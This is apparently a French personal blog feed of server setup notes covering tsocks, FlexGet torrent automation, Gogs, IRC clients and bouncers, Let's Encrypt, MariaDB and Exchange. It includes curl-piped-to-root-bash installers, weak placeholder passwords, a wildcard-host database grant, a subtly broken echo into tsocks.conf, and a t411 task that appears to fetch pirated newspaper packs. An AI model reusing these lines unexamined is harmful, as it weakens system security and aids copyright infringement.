<h2>Capture d'écran</h2>
<p>Ouvrir la console : <code>MAJ</code>+<code>F2</code></p>
<div class="highlight"><pre><span></span><code><span class="err">screenshot --clipboard --fullpage</span>
</code></pre></div>
<h1>SOCKS</h1>
<div class="highlight"><pre><span></span><code>wget https://sourceforge.net/projects/tsocks/files/latest/download -O tsocks
tar xzvf tsocks
./configure
make
make install
<span class="nb">echo</span> <span class="s2">"server = 192.168.0.1\nserver_type = 5\nserver_port = 1080"</span> > /etc/tsocks.conf
tsocks apt update
</code></pre></div>Flexget2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/flexget.html<p><img alt="" src="https://img.nlegall.fr/DtJr1Van"></p>
<p>FlexGet is a multipurpose automation tool for content like torrents, nzbs, podcasts, comics, series, movies, etc. It can use different kinds of sources like RSS-feeds, html pages, csv files, search engines and there are even plugins for sites that do not provide any kind of useful feeds.</p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install …</code></pre></div><p><img alt="" src="https://img.nlegall.fr/DtJr1Van"></p>
<p>FlexGet is a multipurpose automation tool for content like torrents, nzbs, podcasts, comics, series, movies, etc. It can use different kinds of sources like RSS-feeds, html pages, csv files, search engines and there are even plugins for sites that do not provide any kind of useful feeds.</p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code>apt install python-pip
pip install --upgrade setuptools
pip install flexget
</code></pre></div>
<h1>Configuration</h1>
<p>La première étape consiste à ajouter le crontab qui permet de lancer automatiquement flexget à un intervalle défini (ici 20min).</p>
<div class="highlight"><pre><span></span><code><span class="err"># crontab -e</span>
<span class="err">*/20 * * * * /usr/local/bin/flexget --cron execute</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1"># .flexget/config.yml</span>
<span class="nt">tasks</span><span class="p">:</span>
<span class="nt">name task</span><span class="p">:</span>
<span class="nt">rss</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">http://path/to/rss</span>
<span class="nt">accept_all</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">yes</span>
<span class="nt">download</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">/home/user/watch</span>
<span class="nt">priority</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">1</span>
</code></pre></div>
<p>flexget --test execute</p>
<h1>Plugins</h1>
<h2>Series</h2>
<h2>rTorrent</h2>
<p>Vous pouvez envoyer directement le torrent dans voter client rTorrent en ajoutant les lignes ci-dessous dans la <code>task</code> concernée. Vous trouverez l'<code>uri</code> dans votre fichier <code>.rtorrent.rc</code>.</p>
<div class="highlight"><pre><span></span><code><span class="nt">rtorrent</span><span class="p">:</span>
<span class="nt">uri</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">scgi://127.0.0.1:5000</span>
<span class="nt">path</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">/path/to/download_dir</span>
<span class="nt">custom1</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">label</span>
</code></pre></div>
<h2>Slack</h2>
<p>Si vous êtes un utilisateur de Slack, vous pouvez activer la fonctionnalité <code>Incoming Webhooks</code> sur votre team Slack (<a href="https://my.slack.com/services/new/incoming-webhook/">ici</a>) et ajouter les lignes suivantes dans la tâche concernée :</p>
<div class="highlight"><pre><span></span><code><span class="nt">slack</span><span class="p">:</span>
<span class="nt">web_hook_url</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">https://hooks.slack.com/services/xxxxx/xxxxx/xxxxxxxxxx</span>
<span class="nt">username</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">flexget</span>
<span class="nt">icon_emoji</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">book</span>
</code></pre></div>
<p><code>username</code> et <code>icon-emoji</code> permettent de définir le nom du bot sur le chan de Slack et son avatar (dans la liste des émojis disponibles sur Slack).</p>
<h2>t411</h2>
<div class="highlight"><pre><span></span><code>flexget t411 add-auth username password
flexget t411 list-cats
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="nt">presse_t411</span><span class="p">:</span>
<span class="nt">priority</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">20</span>
<span class="nt">t411</span><span class="p">:</span>
<span class="nt">category</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Presse</span>
<span class="nt">regexp</span><span class="p">:</span>
<span class="nt">accept</span><span class="p">:</span>
<span class="p p-Indicator">-</span> <span class="s">"Pack</span><span class="nv"> </span><span class="s">Journaux"</span>
<span class="nt">only_new</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">yes</span>
<span class="nt">download</span><span class="p">:</span> <span class="s">"/tmp/"</span>
</code></pre></div>Gogs2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/gogs.html<p><img alt="" src="https://img.nlegall.fr/eh15VGQk"></p>
<p><em>A painless self-hosted Git service.</em></p>
<h2>Installation</h2>
<div class="highlight"><pre><span></span><code>apt install git openssh-server mariadb-server
adduser -md /home/git git
su git
<span class="nb">cd</span> ~
wget https://dl.gogs.io/0.11.4/linux_amd64.tar.gz
tar zxvf linux_amd64.tar.gz
<span class="nb">cd</span> gogs
./gogs web
</code></pre></div>
<h2>Configuration</h2>
<div class="highlight"><pre><span></span><code><span class="err">#</span><span class="w"> </span><span class="n">vim</span><span class="w"> </span><span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">systemd</span><span class="o">/</span><span class="k">system</span><span class="o">/</span><span class="n">gogs</span><span class="p">.</span><span class="n">service</span><span class="w"></span>
<span class="o">[</span><span class="n">Unit</span><span class="o">]</span><span class="w"></span>
<span class="n">Description</span><span class="o">=</span><span class="n">Gogs</span><span class="w"> </span><span class="p">(</span><span class="k">Go …</span></code></pre></div><p><img alt="" src="https://img.nlegall.fr/eh15VGQk"></p>
<p><em>A painless self-hosted Git service.</em></p>
<h2>Installation</h2>
<div class="highlight"><pre><span></span><code>apt install git openssh-server mariadb-server
adduser -md /home/git git
su git
<span class="nb">cd</span> ~
wget https://dl.gogs.io/0.11.4/linux_amd64.tar.gz
tar zxvf linux_amd64.tar.gz
<span class="nb">cd</span> gogs
./gogs web
</code></pre></div>
<h2>Configuration</h2>
<div class="highlight"><pre><span></span><code><span class="err">#</span><span class="w"> </span><span class="n">vim</span><span class="w"> </span><span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">systemd</span><span class="o">/</span><span class="k">system</span><span class="o">/</span><span class="n">gogs</span><span class="p">.</span><span class="n">service</span><span class="w"></span>
<span class="o">[</span><span class="n">Unit</span><span class="o">]</span><span class="w"></span>
<span class="n">Description</span><span class="o">=</span><span class="n">Gogs</span><span class="w"> </span><span class="p">(</span><span class="k">Go</span><span class="w"> </span><span class="n">Git</span><span class="w"> </span><span class="n">Service</span><span class="p">)</span><span class="w"></span>
<span class="k">After</span><span class="o">=</span><span class="n">syslog</span><span class="p">.</span><span class="n">target</span><span class="w"></span>
<span class="k">After</span><span class="o">=</span><span class="n">network</span><span class="p">.</span><span class="n">target</span><span class="w"></span>
<span class="o">[</span><span class="n">Service</span><span class="o">]</span><span class="w"></span>
<span class="n">Type</span><span class="o">=</span><span class="n">simple</span><span class="w"></span>
<span class="k">User</span><span class="o">=</span><span class="n">git</span><span class="w"></span>
<span class="k">Group</span><span class="o">=</span><span class="n">git</span><span class="w"></span>
<span class="n">WorkingDirectory</span><span class="o">=/</span><span class="n">home</span><span class="o">/</span><span class="n">git</span><span class="o">/</span><span class="n">gogs</span><span class="w"></span>
<span class="n">ExecStart</span><span class="o">=/</span><span class="n">home</span><span class="o">/</span><span class="n">git</span><span class="o">/</span><span class="n">gogs</span><span class="o">/</span><span class="n">gogs</span><span class="w"> </span><span class="n">web</span><span class="w"></span>
<span class="n">Restart</span><span class="o">=</span><span class="n">always</span><span class="w"></span>
<span class="n">Environment</span><span class="o">=</span><span class="k">USER</span><span class="o">=</span><span class="n">git</span><span class="w"> </span><span class="n">HOME</span><span class="o">=/</span><span class="n">home</span><span class="o">/</span><span class="n">git</span><span class="w"></span>
<span class="o">[</span><span class="n">Install</span><span class="o">]</span><span class="w"></span>
<span class="n">WantedBy</span><span class="o">=</span><span class="n">multi</span><span class="o">-</span><span class="k">user</span><span class="p">.</span><span class="n">target</span><span class="w"></span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>systemctl <span class="nb">enable</span> gogs
systemctl start gogs
systemctl status gogs
</code></pre></div>
<h2>Transfert d'un dépôt SVN</h2>
<p>https://subgit.com/download.html</p>
<div class="highlight"><pre><span></span><code><span class="err">.\subgit.bat configure "file://kermene.fr/partages/010-UIS000/190-Nicolas Le Gall/KerESB" git</span>
<span class="err">.\subgit.bat install git</span>
</code></pre></div>IRC2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/irc.html<p>Internet Relay Chat ou IRC (en français, « discussion relayée par Internet ») est un protocole de communication textuelle sur Internet. Il sert à la communication instantanée principalement sous la forme de discussions en groupe par l’intermédiaire de canaux de discussion, mais peut aussi être utilisé pour de la communication de …</p><p>Internet Relay Chat ou IRC (en français, « discussion relayée par Internet ») est un protocole de communication textuelle sur Internet. Il sert à la communication instantanée principalement sous la forme de discussions en groupe par l’intermédiaire de canaux de discussion, mais peut aussi être utilisé pour de la communication de un à un. Il peut par ailleurs être utilisé pour faire du transfert de fichier.</p>
<h1>Installation de Kiwi IRC</h1>
<p>Si vous n'avez pas Node.js d'installer :</p>
<div class="highlight"><pre><span></span><code>curl -sL https://deb.nodesource.com/setup_5.x <span class="p">|</span> sudo -E bash -
sudo apt-get install -y nodejs
</code></pre></div>
<div class="highlight"><pre><span></span><code>git clone https://github.com/prawnsalad/KiwiIRC.git <span class="o">&&</span> <span class="nb">cd</span> KiwiIRC
npm install
cp config.example.js config.js
vim config.js
./kiwi build
./kiwi start
http://serveurname:7778/
</code></pre></div>
<p>Si vous souhaitez faire un proxy sur Kiwi IRC pour l'avoir sur une URL ou un sous-domaine :</p>
<div class="highlight"><pre><span></span><code><span class="k">location</span> <span class="s">/kiwi/</span> <span class="p">{</span>
<span class="kn">proxy_set_header</span> <span class="s">Host</span> <span class="nv">$host</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">X-Real-IP</span> <span class="nv">$remote_addr</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">x-forwarded-for</span> <span class="nv">$proxy_add_x_forwarded_for</span><span class="p">;</span>
<span class="kn">proxy_pass</span> <span class="s">http://localhost:7778/kiwi/</span><span class="p">;</span>
<span class="kn">proxy_redirect</span> <span class="s">default</span><span class="p">;</span>
<span class="c1"># Websocket support (from version 1.4)</span>
<span class="kn">proxy_http_version</span> <span class="mi">1</span><span class="s">.1</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">Upgrade</span> <span class="nv">$http_upgrade</span><span class="p">;</span>
<span class="kn">proxy_set_header</span> <span class="s">Connection</span> <span class="s">"upgrade"</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>Si vous souhaitez un thème plus foncé, vous pouvez installation en récupérer les fichiers ici : https://github.com/prawnsalad/KiwiIRC/pull/835</p>
<div class="highlight"><pre><span></span><code>mkdir KiwiIRC/client/assets/themes/morning
<span class="nb">cd</span> KiwiIRC/client/assets/themes/morning
wget https://raw.githubusercontent.com/xPaw/KiwiIRC/morning-theme/client/assets/themes/morning/theme.json
wget https://raw.githubusercontent.com/xPaw/KiwiIRC/morning-theme/client/assets/themes/morning/style.css
<span class="nb">cd</span> ../../../../
vim config.js
<span class="c1"># Add "'morning'," line 231</span>
</code></pre></div>
<h1>Installation de Lounge</h1>
<div class="highlight"><pre><span></span><code>curl -sL https://deb.nodesource.com/setup_4.x <span class="p">|</span> sudo -E bash -
sudo apt-get install -y nodejs
sudo npm install -g thelounge
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1">// vim /root/.lounge/config.js</span>
<span class="kr">public</span>
<span class="nx">host</span><span class="o">:</span> <span class="s2">"127.0.0.1"</span><span class="p">,</span>
<span class="nx">theme</span><span class="o">:</span> <span class="s2">"themes/zenburn.css"</span><span class="p">,</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>lounge add user
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1">// vim /root/.lounge/users/user.js</span>
<span class="p">{</span>
<span class="s2">"user"</span><span class="o">:</span> <span class="s2">"example"</span><span class="p">,</span>
<span class="s2">"password"</span><span class="o">:</span> <span class="s2">"password"</span><span class="p">,</span>
<span class="s2">"log"</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="s2">"networks"</span><span class="o">:</span> <span class="p">[{</span>
<span class="s2">"name"</span><span class="o">:</span> <span class="s2">"Freenode"</span><span class="p">,</span>
<span class="s2">"host"</span><span class="o">:</span> <span class="s2">"irc.freenode.net"</span><span class="p">,</span>
<span class="s2">"port"</span><span class="o">:</span> <span class="mi">6697</span><span class="p">,</span>
<span class="s2">"tls"</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="s2">"password"</span><span class="o">:</span> <span class="s2">"serverpw"</span><span class="p">,</span>
<span class="s2">"nick"</span><span class="o">:</span> <span class="s2">"john"</span><span class="p">,</span>
<span class="s2">"realname"</span><span class="o">:</span> <span class="s2">"John Doe"</span><span class="p">,</span>
<span class="s2">"commands"</span><span class="o">:</span> <span class="p">[</span>
<span class="s2">"/msg NickServ identify password"</span><span class="p">,</span>
<span class="s2">"/msg ChanServ op #chan"</span>
<span class="p">],</span>
<span class="s2">"join"</span><span class="o">:</span> <span class="s2">"#foo, #bar"</span>
<span class="p">}]</span>
<span class="p">}</span>
</code></pre></div>
<h1>Installation d'un bouncer ZNC</h1>
<p><img alt="" src="https://img.nlegall.fr/MnAcwLi0"></p>
<p>ZNC is an IRC network bouncer or BNC. It can detach the client from the actual IRC server, and also from selected channels. Multiple clients from different locations can connect to a single ZNC account simultaneously and therefore appear under the same nickname on IRC. It supports SSL secured connections and IPv6.</p>
<h2>Fonctionnement sans ZNC</h2>
<p><img alt="" src="https://img.nlegall.fr/cGKoJewp"></p>
<p>Le client se connecte directement au près du serveur IRC. En cas de déconnexion, le client perd alors le contenu jusqu'à sa prochaine connexion.</p>
<h2>Fonctionnement avec ZNC</h2>
<p><img alt="" src="https://img.nlegall.fr/RpTqbnRD"></p>
<p>Le client ne se connecte plus directement sur le serveur IRC mais sur le ZNC. C'est lui qui est alors directement connecté sur l'IRC. Il garde alors en mémoire l’ensemble du contenu et le renvoie ensuite à l'utilisateur lors de sa connexion.</p>
<p>Download the latest source tarball</p>
<div class="highlight"><pre><span></span><code>wget http://znc.in/releases/znc-1.6.3.tar.gz
tar -xzvf znc*.*gz
<span class="nb">cd</span> znc*
./configure
make
make install
znc --makeconf
</code></pre></div>
<p><em>Modification de la configuration pour améliorer la sécurité : forcer le TLS et les chiphers</em></p>
<div class="highlight"><pre><span></span><code><span class="c1"># Renouvellement du certificat</span>
znc --makepem
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"># vim .znc/conf/znc.conf</span>
<span class="err">SSLProtocols = -SSLv2 -SSLv3 -TLSv1 +TLSv1.1 +TLSv1.2</span>
<span class="err">SSLCiphers = EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH</span>
</code></pre></div>
<h1>Hexchat</h1>
<div class="highlight"><pre><span></span><code>https://dl.hexchat.net/themes/Solarized%20Dark.hct
git clone https://github.com/hexchat/hexchat.git
<span class="nb">cd</span> hexchat
./autogen.sh
./configure --with-theme-manager
make <span class="o">&&</span> sudo make install
</code></pre></div>Let's Encrypt2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/lets-encrypt.html<p><em>It’s free, automated, and open</em></p>
<p><img alt="" src="https://img.nlegall.fr/2FHlW4NU"></p>
<p>Let's Encrypt est une autorité de certification lancée le 3 décembre 2015 (Bêta Version Publique). Cette autorité fournit des certificats gratuits X.509 pour le protocole cryptographique TLS au moyen d'un processus automatisé destiné à se passer du processus complexe actuel impliquant la création …</p><p><em>It’s free, automated, and open</em></p>
<p><img alt="" src="https://img.nlegall.fr/2FHlW4NU"></p>
<p>Let's Encrypt est une autorité de certification lancée le 3 décembre 2015 (Bêta Version Publique). Cette autorité fournit des certificats gratuits X.509 pour le protocole cryptographique TLS au moyen d'un processus automatisé destiné à se passer du processus complexe actuel impliquant la création manuelle, la validation, la signature, l'installation et le renouvellement des certificats pour la sécurisation des sites internet.</p>
<h1>Fonctionnement</h1>
<p>Il vérifie l'identité du domaine choisi via une clé publique. Lors de la première utilisation pour ce domaine, il génère donc une paire de clé (privée/publique). Il va ensuite utiliser une URL connu afin de vérifie les clés. Let's ecnrypt mets un fichier à se chemin qui sera ensuite signé par l'agent local via la clé privée générée précédemment. Il notifie ensuite l'autorité que le fichier est signé et peut donc être vérifié. Il vérifie la signature ainsi que le contenu en le téléchargeant. Si tout correspond, il autorise alors la délivrance du certificat.</p>
<p><img alt="" src="https://img.nlegall.fr/odFCEK3S"></p>
<p><img alt="" src="https://img.nlegall.fr/JkkfdWHe"></p>
<h1>Mise en place</h1>
<p>La meilleurs manière d'avoir le client est de le récupérer directement depuis leur dépôt GitHub officiel. Vous aurez ainsi la dernière version stable disponible et vous pourrez le mettre à jour rapidement via la commande <code>git pull</code>.</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> /tmp
git clone https://github.com/letsencrypt/letsencrypt
<span class="nb">cd</span> letsencrypt
</code></pre></div>
<h1>Site Web</h1>
<p>Il est recommandé d'arrêter votre serveur web actuel (Apache2, nginx, litghthhtp) avant de lancer la demande de certificat. Cela vous permettra de faire ce dernier sans soucis et de modifier la configuration relative au site pour y ajouter le certificat ainsi généré.</p>
<div class="highlight"><pre><span></span><code>./letsencrypt-auto certonly --rsa-key-size <span class="m">4096</span> -d domail.tld
</code></pre></div>
<h2>Nginx</h2>
<div class="highlight"><pre><span></span><code><span class="k">server</span> <span class="p">{</span>
<span class="kn">listen</span> <span class="mi">443</span> <span class="s">ssl</span> <span class="s">default_server</span><span class="p">;</span>
<span class="kn">server_name</span> <span class="s">my-domain</span><span class="p">;</span>
<span class="kn">ssl_certificate</span> <span class="s">/etc/letsencrypt/live/my-domain/fullchain.pem</span><span class="p">;</span>
<span class="kn">ssl_certificate_key</span> <span class="s">/etc/letsencrypt/live/my-domain/privkey.pem</span><span class="p">;</span>
<span class="kn">...</span>
<span class="err">}</span>
</code></pre></div>
<h1>Mail</h1>
<div class="highlight"><pre><span></span><code>./letsencrypt-auto certonly --rsa-key-size <span class="m">4096</span> -d mail.domain.tld --email contact@domain.tld --agree-tos
</code></pre></div>
<p><em>Si votre serveur gère plusieurs nom de domaines, il faut rajouter l'ensemble des domaines suivant sous la même forme : <code>-d mail.domain2.tld</code>.</em></p>
<h2>Postfix</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/postfix/main.cf</span>
<span class="err">smtp_tls_CAfile = /etc/letsencrypt/live/mail.domain.tld/chain.pem</span>
<span class="err">smtpd_tls_cert_file = /etc/letsencrypt/live/mail.domain.tld/cert.pem</span>
<span class="err">smtpd_tls_key_file = /etc/letsencrypt/live/mail.domain.tld/privkey.pem</span>
</code></pre></div>
<h2>Dovecot</h2>
<div class="highlight"><pre><span></span><code><span class="err"># vim /etc/dovecot/conf.d/10-ssl.conf</span>
<span class="err">ssl_cert = </etc/letsencrypt/live/mail.domain.tld/fullchain.pem</span>
<span class="err">ssl_key = </etc/letsencrypt/live/mail.domain.tld/privkey.pem</span>
</code></pre></div>
<h1>Renouvellement automatique</h1>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/sh</span>
service nginx stop <span class="c1"># or whatever your webserver is</span>
/path/to/letsencrypt-auto renew -nvv --standalone > /var/log/letsencrypt/renew.log <span class="m">2</span>><span class="p">&</span><span class="m">1</span>
<span class="nv">LE_STATUS</span><span class="o">=</span><span class="nv">$?</span>
service nginx start <span class="c1"># or whatever your webserver is</span>
<span class="k">if</span> <span class="o">[</span> <span class="s2">"</span><span class="nv">$LE_STATUS</span><span class="s2">"</span> !<span class="o">=</span> <span class="m">0</span> <span class="o">]</span><span class="p">;</span> <span class="k">then</span>
<span class="nb">echo</span> Automated renewal failed:
cat /var/log/letsencrypt/renew.log
<span class="nb">exit</span> <span class="m">1</span>
<span class="k">fi</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1"># We use a 4096 bit RSA key instead of 2048</span>
<span class="na">rsa-key-size</span> <span class="o">=</span> <span class="s">4096</span>
<span class="na">email</span> <span class="o">=</span> <span class="s">mail@domain.tld</span>
<span class="na">domains</span> <span class="o">=</span> <span class="s">domain.tld,www.domain.tld</span>
<span class="na">authenticator</span> <span class="o">=</span> <span class="s">webroot</span>
<span class="c1"># This is the webroot directory of your domain in which</span>
<span class="c1"># letsencrypt will write a hash in /.well-known/acme-challenge directory.</span>
<span class="na">webroot-path</span> <span class="o">=</span> <span class="s">/var/www/letsencrypt/domain.tld/</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="k">location</span> <span class="s">'/.well-known/acme-challenge'</span> <span class="p">{</span>
<span class="kn">root</span> <span class="s">/var/www/domain.tld/</span><span class="p">;</span>
<span class="kn">try_files</span> <span class="nv">$uri</span> <span class="s">/</span><span class="nv">$1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>Liens utiles2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/liens-utiles.html<h1>SSL</h1>
<p>https://tls.imirhil.fr
https://www.ssllabs.com/ssltest/
https://observatory.mozilla.org/</p>
<h1>Check site</h1>
<p>https://webbkoll.dataskydd.net/en
https://report-uri.io/home/generate</p>
<h1>Images</h1>
<p>https://lut.im/</p>
<h1>Dev</h1>
<p>https://shields.io/#your-badge
https://www.browserleaks.com/</p>
<h1>Pilotes</h1>
<p>https://sourceforge.net/projects/drvback/</p>MairaDB/MySQL2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/mairadbmysql.html<h1>Afficher les tables d'une base de données</h1>
<div class="highlight"><pre><span></span><code><span class="k">SHOW</span> <span class="n">tables</span><span class="p">;</span>
</code></pre></div>
<h1>Afficher les attributs d'une table</h1>
<div class="highlight"><pre><span></span><code><span class="k">DESC</span> <span class="k">table</span><span class="p">;</span>
</code></pre></div>
<h1>Créer une base de données</h1>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">database_name</span><span class="p">;</span>
</code></pre></div>
<h1>Créer un utilisateur et donner les droits sur une base</h1>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">USER</span> <span class="s1">'username'</span><span class="o">@</span><span class="s1">'%'</span> <span class="n">IDENTIFIED</span> <span class="k">BY</span> <span class="s1">'password'</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">ALL</span> <span class="k">PRIVILEGES</span> <span class="k">ON</span> <span class="n">database_name</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="n">username</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">USAGE</span> <span class="k">ON …</span></code></pre></div><h1>Afficher les tables d'une base de données</h1>
<div class="highlight"><pre><span></span><code><span class="k">SHOW</span> <span class="n">tables</span><span class="p">;</span>
</code></pre></div>
<h1>Afficher les attributs d'une table</h1>
<div class="highlight"><pre><span></span><code><span class="k">DESC</span> <span class="k">table</span><span class="p">;</span>
</code></pre></div>
<h1>Créer une base de données</h1>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">database_name</span><span class="p">;</span>
</code></pre></div>
<h1>Créer un utilisateur et donner les droits sur une base</h1>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">USER</span> <span class="s1">'username'</span><span class="o">@</span><span class="s1">'%'</span> <span class="n">IDENTIFIED</span> <span class="k">BY</span> <span class="s1">'password'</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">ALL</span> <span class="k">PRIVILEGES</span> <span class="k">ON</span> <span class="n">database_name</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="n">username</span><span class="p">;</span>
<span class="k">GRANT</span> <span class="k">USAGE</span> <span class="k">ON</span> <span class="o">*</span><span class="p">.</span><span class="o">*</span> <span class="k">TO</span> <span class="n">username</span><span class="o">@%</span> <span class="n">IDENTIFIED</span> <span class="k">BY</span> <span class="s1">'password'</span><span class="p">;</span>
</code></pre></div>
<h1>Exporter un résultat en CSV</h1>
<div class="highlight"><pre><span></span><code><span class="k">SELECT</span> <span class="o">*</span>
<span class="k">INTO</span> <span class="n">OUTFILE</span> <span class="s1">'/tmp/output.csv'</span>
<span class="n">FIELDS</span> <span class="n">TERMINATED</span> <span class="k">BY</span> <span class="s1">','</span>
<span class="n">ENCLOSED</span> <span class="k">BY</span> <span class="s1">'"'</span>
<span class="n">ESCAPED</span> <span class="k">BY</span> <span class="s1">'\\'</span>
<span class="n">LINES</span> <span class="n">TERMINATED</span> <span class="k">BY</span> <span class="s1">'\n'</span>
<span class="k">FROM</span> <span class="n">tables</span><span class="p">;</span>
</code></pre></div>Microsoft Exchange2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/microsoft-exchange.html<p><img alt="" src="https://img.nlegall.fr/27dx79fr"></p>
<p>Catalogue globale : copie du domaine et copie partielle en lecture seule des autres domaines - Une copie local par site obligatoire</p>
<p>OS
IIS (toutes les cases)
UCMA
FilterPAck
PowerShell Script (RSAT et ADDSTools)
Redémarrer
/PrepareAD (Administrateurs du schéma)
BAL en PREMIER et CAS après</p>
<h1>Droits</h1>
<p>Administrateurs local (OS et pré-requis)
Administrateurs …</p><p><img alt="" src="https://img.nlegall.fr/27dx79fr"></p>
<p>Catalogue globale : copie du domaine et copie partielle en lecture seule des autres domaines - Une copie local par site obligatoire</p>
<p>OS
IIS (toutes les cases)
UCMA
FilterPAck
PowerShell Script (RSAT et ADDSTools)
Redémarrer
/PrepareAD (Administrateurs du schéma)
BAL en PREMIER et CAS après</p>
<h1>Droits</h1>
<p>Administrateurs local (OS et pré-requis)
Administrateurs du domaine (intégration au domaine)
Administrateurs du schéma (PrepareAD)
Administrateur de l'entreprise (installation des rôles)</p>
<h1>Rôles serveurs</h1>
<h2>Serveur d'accès client (CAS)</h2>
<ul>
<li>Authentification des clients</li>
<li>Routage, vérification et filtrage</li>
<li>Gestion des protocoles clients</li>
<li>Gestion des connexions SMTP au serveur</li>
<li>Carnets d'adresses hors ligne</li>
<li>Info-courrier</li>
<li>Certificat</li>
</ul>
<h2>Serveur de boîtes aux lettres (BAL)</h2>
<ul>
<li>Base de données</li>
<li>Règles de transport (HUB)</li>
<li>Catégorisation</li>
<li>Messagerie unifiée</li>
<li>Dossiers publics (boite aux lettres)</li>
<li>Protection AV et anti-spam</li>
</ul>
<h2>Serveur Edge</h2>
<ul>
<li>AD-LDS</li>
<li>Relais SMTP</li>
<li>Protection AV et anti-spam</li>
<li>Règles de transport avec des connecteurs SMTP</li>
<li>Réécriture d'adresse</li>
</ul>
<h1>Version</h1>
<h2>Exchange</h2>
<table>
<thead>
<tr>
<th>Édition</th>
<th>Composants</th>
</tr>
</thead>
<tbody>
<tr>
<td>Standard</td>
<td>5 bases de données de BAL</td>
</tr>
<tr>
<td>Entreprise</td>
<td>50 bases de données de BAL</td>
</tr>
</tbody>
</table>
<h2>CAL</h2>
<table>
<thead>
<tr>
<th>Édition</th>
<th>Composants</th>
</tr>
</thead>
<tbody>
<tr>
<td>Standard</td>
<td>Courrier, calendrier, OWA et ActiveSync</td>
</tr>
<tr>
<td>Entreprise</td>
<td>Courrier, calendrier, OWA, ActiveSync, messagerie unifiée, journalisation, Forefront...</td>
</tr>
</tbody>
</table>
<h1>Scénarios de déploiement</h1>
<ul>
<li>Tout les rôles Exchange sur le même serveur</li>
<li>Au moins un serveur par rôle</li>
<li>Déploiement hybride</li>
</ul>
<h1>DNS</h1>
<p><img alt="" src="https://img.nlegall.fr/3a9Mk63m"></p>
<h1>Installation</h1>
<div class="highlight"><pre><span></span><code><span class="nb">Install-WindowsFeature</span> <span class="n">AS-HTTP-Activation</span><span class="p">,</span><span class="n">NET-Framework</span><span class="p">-</span><span class="n">45-Features</span><span class="p">,</span><span class="n">Web-Mgmt-Console</span><span class="p">,</span><span class="n">WAS-Process-Model</span><span class="p">,</span><span class="n">Web-Asp-Net45</span><span class="p">,</span><span class="n">Web-Basic-Auth</span><span class="p">,</span><span class="n">Web-Client-Auth</span><span class="p">,</span><span class="n">Web-Digest-Auth</span><span class="p">,</span><span class="n">Web-Dir-Browsing</span><span class="p">,</span><span class="n">Web-Dyn-Compression</span><span class="p">,</span><span class="n">Web-Http-Errors</span><span class="p">,</span><span class="n">Web-Http-Logging</span><span class="p">,</span><span class="n">Web-Http-Redirect</span><span class="p">,</span><span class="n">Web-Http-Tracing</span><span class="p">,</span><span class="n">Web-ISAPI-Ext</span><span class="p">,</span><span class="n">Web-ISAPI-Filter</span><span class="p">,</span><span class="n">Web-Lgcy-Mgmt-Console</span><span class="p">,</span><span class="n">Web-Metabase</span><span class="p">,</span><span class="n">Web-Mgmt-Console</span><span class="p">,</span><span class="n">Web-Mgmt-Service</span><span class="p">,</span><span class="n">Web-Net-Ext45</span><span class="p">,</span><span class="n">Web-Request-Monitor</span><span class="p">,</span><span class="n">Web-Server</span><span class="p">,</span><span 